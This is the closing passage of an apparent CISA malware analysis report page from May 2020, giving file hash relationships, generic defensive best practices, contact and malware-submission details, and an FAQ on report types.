fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 e1546323dc...
Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
e200517ab9... Contained_Within
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
RECOMMENDATIONS
CISA recommends that users and administrators consider using the following best
practices to strengthen the security posture of their organization's systems.
Any configuration changes should be reviewed by system owners and administrators
prior to implementation to avoid unwanted impacts.
* Maintain up-to-date antivirus signatures and engines.
* Keep operating system patches up-to-date.
* Disable File and Printer sharing services. If these services are required,
use strong passwords or Active Directory authentication.
* Restrict users' ability (permissions) to install and run unwanted software
applications. Do not add users to the local administrators group unless
required.
* Enforce a strong password policy and implement regular password changes.
* Exercise caution when opening e-mail attachments even if the attachment is
expected and the sender appears to be known.
* Enable a personal firewall on agency workstations, configured to deny
unsolicited connection requests.
* Disable unnecessary services on agency workstations and servers.
* Scan for and remove suspicious e-mail attachments; ensure the scanned
attachment is its "true file type" (i.e., the extension matches the file
header).
* Monitor users' web browsing habits; restrict access to sites with unfavorable
content.
* Exercise caution when using removable media (e.g., USB thumb drives, external
drives, CDs, etc.).
* Scan all software downloaded from the Internet prior to executing.
* Maintain situational awareness of the latest threats and implement
appropriate Access Control Lists (ACLs).
Additional information on malware incident prevention and handling can be found
in National Institute of Standards and Technology (NIST) Special Publication
800-83, "Guide to Malware Incident Prevention & Handling for Desktops and
Laptops".
CONTACT INFORMATION
* 1-888-282-0870
* NCCICCustomerService@us-cert.gov(link sends email) (UNCLASS)
* us-cert@dhs.sgov.gov(link sends email) (SIPRNET)
* us-cert@dhs.ic.gov(link sends email) (JWICS)
CISA continuously strives to improve its products and services. You can help by
answering a very short series of questions about this product at the following
URL: https://us-cert.gov/forms/feedback/
DOCUMENT FAQ
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide
organizations with malware analysis in a timely manner. In most instances this
report will provide initial indicators for computer and network defense. To
request additional analysis, please contact CISA and provide information
regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide
organizations with more detailed malware analysis acquired via manual reverse
engineering. To request additional analysis, please contact CISA and provide
information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by
recipients. All comments or questions related to this document should be
directed to the CISA at 1-888-282-0870 or soc@us-cert.gov(link sends email).
Can I submit malware to CISA? Malware samples can be submitted via three
methods:
* Web: https://malware.us-cert.gov
* E-Mail: submit@malware.us-cert.gov(link sends email)
* FTP: ftp.malware.us-cert.gov (anonymous)
CISA encourages you to report any suspicious activity, including cybersecurity
incidents, possible malicious code, software vulnerabilities, and
phishing-related scams. Reporting forms can be found on CISA's homepage at
www.us-cert.gov.
REVISIONS
May 12, 2020: Initial version
This product is provided subject to this Notification and this Privacy &
Use policy.
PLEASE SHARE YOUR THOUGHTS
We recently updated our anonymous product survey; we’d welcome your feedback.
Return to top
* Topics
* Spotlight
* Resources & Tools
* News & Events
* Careers
* About
Cybersecurity & Infrastructure Security Agency
* Facebook
* Twitter
* LinkedIn
* YouTube
* Instagram
* RSS
CISA Central 1-844-Say-CISA SayCISA@cisa.dhs.gov
DHS Seal
CISA.gov
An official website of the U.S. Department of Homeland Security
* About CISA
* Budget and Performance
* DHS.gov
* Equal Opportunity & Accessibility
* FOIA Requests
* No FEAR Act
* Office of Inspector General
* Privacy Policy
* Subscribe
* The White House
* USA.gov
* Website Feedback